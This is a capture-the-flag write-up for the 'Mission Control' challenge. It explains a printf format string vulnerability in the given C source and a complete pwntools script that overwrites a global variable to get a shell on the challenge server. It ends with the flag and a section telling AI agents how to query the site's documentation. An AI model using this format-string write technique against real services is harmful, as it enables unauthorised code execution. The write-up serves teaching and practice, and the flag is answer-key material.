# Mission Control ## Description There have been many hackers trying to compromise our mission control panel lately. We have added a few verification checks! `nc 20.198.209.142 55021` *The flag is in the flag format: STC{...}* **Author: zeyu2001** {% file src="/files/-MfMAIHqMGt\_NlT9N9k8" %} mission\_control {% endfile %} {% file src="/files/-MfMAJFPbNBIHDoRKsKe" %} mission\_control.c {% endfile %} ## Solution ### Source Code Analysis To get the flag, users must overwrite the `secret_code` global variable. ```c #define ADMIN_CODE 200 int secret_code = 0; ... int main(int argc, char **argv) { if (secret_code == ADMIN_CODE) { give_shell(); } else { printf("Sorry, this area is currently disabled.\n"); } return 0; } ``` Now let's look at the rest of the code. User input is read into `buf`, and `buf` is concatenated to `to_print` before `printf(to_print)` is called. ```c ... char buf[128]; memset(buf, 0, sizeof(buf)); fgets(buf, 128, stdin); char to_print[256]; memset(to_print, 0, sizeof(to_print)); strcpy(to_print, "You said: "); strcat(to_print, buf); printf(to_print); printf("Code: %d\n", secret_code); ... ``` This is a classic format string vulnerability. User input is directly passed into the `printf` format string, allowing us to write to arbitrary memory addresses. An additional restriction is that the first 16 characters of the input must be "I am not a robot". ```c if (strncmp(buf, "I am not a robot", 16) == 0) { printf("Glad to hear that!\n"); } else { printf("Stop hacking us!\n"); return 0; } ``` ### Exploitation Using `objdump`, we can find the memory address of `secret_code`. ``` $ objdump -t mission_control | grep secret_code 080dffbc g O .bss 00000004 secret_code ``` We need to send 4 bytes in order to specify the address which we want to overwrite. Let this be `AAAA` for now. By sending `I am not a robotAAAA%x.%x.%x ...`, we can leak the stack values (every `%x` represents 4 bytes). ![](/files/uNDvia62xccJJeNwm2zM) Notice that `4141746f` appears at the 10th index and `78254141` at the 11th index. We need the full four bytes to be at the same index, so let's add two extra bytes before the `AAAA`. ![](/files/EIlHRnDg4TR0LpxoD1pY) We have added two extra bytes `BB` and used Direct Parameter Access (DPA) to specify we want the 11th index. The payload is `I am not a robotBBAAAA%11$p`. As we can see, the 11th index is now our `AAAA` string, i.e.`0x41414141`. Perfect! The final payload is `I am not a robotBB\xbc\xff\x0d\x08%168x%11$n`. * `\xbc\xff\x0d\x08` is the memory address of `secret_code` (0x080dffbc) in little-endian. * `%168x%11$n` writes 168 + \[bytes already wrote] to the address on the 11th index. The exploitation process is outlined by this script: ```python from pwn import * # Bruteforce the index of the buffer conn = remote("20.198.209.142", 55021) print(conn.recv()) conn.send("I am not a robotBBAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x\r\n") print(conn.recv()) # Check the index of the buffer conn = remote("20.198.209.142", 55021) print(conn.recv()) conn.send(b"I am not a robotBBAAAA%11$p\r\n") print(conn.recv()) # Overwrite the secret_code address conn = remote("20.198.209.142", 55021) print(conn.recv()) conn.send(b"I am not a robotBB\xbc\xff\x0d\x08%168x%11$n\r\n") # 080dffbc print(conn.recv()) conn.interactive() ``` Once we overwrite the secret code, we are given a shell. ![](/files/6OuOZ403XnWxWpEmEH2d) The flag is `STC{1_l0v3_f0rm4t_st1ngs_0ab7a4af7bb1343810ccde8244031f2f}`. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ctf.zeyu2001.com/my-challenges/standcon-ctf-2021/mission-control.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.